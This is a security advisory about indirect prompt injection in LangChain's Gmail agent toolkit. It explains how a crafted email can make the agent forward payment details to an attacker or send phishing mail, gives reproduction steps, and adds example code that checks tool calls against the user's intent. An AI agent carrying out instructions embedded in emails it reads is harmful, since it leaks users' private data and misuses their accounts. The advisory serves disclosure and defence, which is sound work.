LangChain Gmail Toolkit Remote Indirect Prompt Injection Vulnerability Allowing Code Execution

Vulnerability

A remote indirect prompt injection vulnerability has been identified in the LangChain GmailToolkit component, in version 0.3.51 and prior. The vulnerability allows attackers to execute arbitrary code by sending a crafted email that is then processed by an email agent created with LangChain. The agent unconditionally executes commands derived from the email content, leading to unauthorized actions such as forwarding sensitive emails or sending phishing messages from the victim's account.

Impact

Exploitation of this vulnerability allows for remote control of the victim's email agent, with the potential to access and forward sensitive emails, send phishing messages using the victim's account, and consume the victim's token budget.

Reproduction

To reproduce this vulnerability, first set up a LangChain email agent using the GmailToolkit. After the agent is created, send a malicious email to the victim's inbox from another account. The email should contain instructions for the agent to follow, such as extracting payment information from a Google email and forwarding it to the attacker's account. Once the email is received, invoke the agent to read and analyze the email content. The agent will execute the instructions embedded in the email, resulting in the unauthorized forwarding of private information.

Remediation

It is recommended to introduce an intent-verification module that audits the outputs of the language model and ensures that API calls align directly with the user's instructions. This could prevent the agent from executing commands based on untrusted email content.
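One way such an intent-verification check could look, as an added example that is not LangChain's code or part of the original advisory: each tool call the model proposes is compared against an intent built only from the user's own request, so a send or forward that originates from email content is refused. The UserIntent, verify_call and audit_plan names are hypothetical, the tool names are assumed to match those GmailToolkit exposes, and the addresses and plan are constructed.

```python
from dataclasses import dataclass

# Tool names assumed to match GmailToolkit; "to"/"cc"/"bcc" follow send_gmail_message.
READ_ONLY = {"search_gmail", "get_gmail_message", "get_gmail_thread"}
SIDE_EFFECT = {"send_gmail_message", "create_gmail_draft"}

@dataclass(frozen=True)
class UserIntent:
    """Built from the user's own request only, never from fetched email text."""
    allowed_tools: frozenset
    allowed_recipients: frozenset = frozenset()

def _recipients(args):
    found = set()
    for key in ("to", "cc", "bcc"):  # bcc counts: a hidden copy is still exfiltration
        value = args.get(key) or []
        if isinstance(value, str):
            value = [value]
        found.update(v.strip().lower() for v in value)
    return found

def verify_call(intent, tool, args):
    """Return (allowed, reason) for one tool call proposed by the model."""
    if tool not in READ_ONLY | SIDE_EFFECT:
        return False, f"unknown tool {tool!r}"
    if tool not in intent.allowed_tools:
        return False, f"{tool} was not requested by the user"
    if tool in SIDE_EFFECT:
        extra = _recipients(args) - intent.allowed_recipients
        if extra:
            return False, f"recipients not named by the user: {sorted(extra)}"
    return True, "ok"

def audit_plan(intent, calls):
    """Check every proposed call before any of them is executed."""
    return [(tool, *verify_call(intent, tool, args)) for tool, args in calls]

# Constructed sample: the user asked only for a summary of unread mail.
SUMMARIZE = UserIntent(frozenset(READ_ONLY))
# Constructed sample: the user asked to reply to one named contact.
REPLY = UserIntent(frozenset(READ_ONLY | {"send_gmail_message"}),
                   frozenset({"alice@example.com"}))
# Constructed plan: the last call comes from instructions inside the email body.
INJECTED_PLAN = [
    ("search_gmail", {"query": "is:unread"}),
    ("get_gmail_message", {"message_id": "MSG_ID_PLACEHOLDER"}),
    ("send_gmail_message", {"to": "attacker@example.com", "message": "..."}),
]

if __name__ == "__main__":
    print(*audit_plan(SUMMARIZE, INJECTED_PLAN), sep="\n")
```

The check sits between the model and the tool executor and fails closed: a rejected call is dropped or escalated to the user for confirmation rather than run.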

Added: Jul 29, 2025, 3:20 PM
Updated: Jul 29, 2025, 3:20 PM

Vulnerability Rating

Custom Algorithm

spread: 6.6
impact: 7.5
exploitability: 5.8
remediation: 7.7
relevance: 0.3
threat: 6.4
urgency: 2.9
incentive: 1.7

Our algorithm analyzes dozens of metrics to generate these 8 key vulnerability categories, which are then combined to calculate the overall risk score.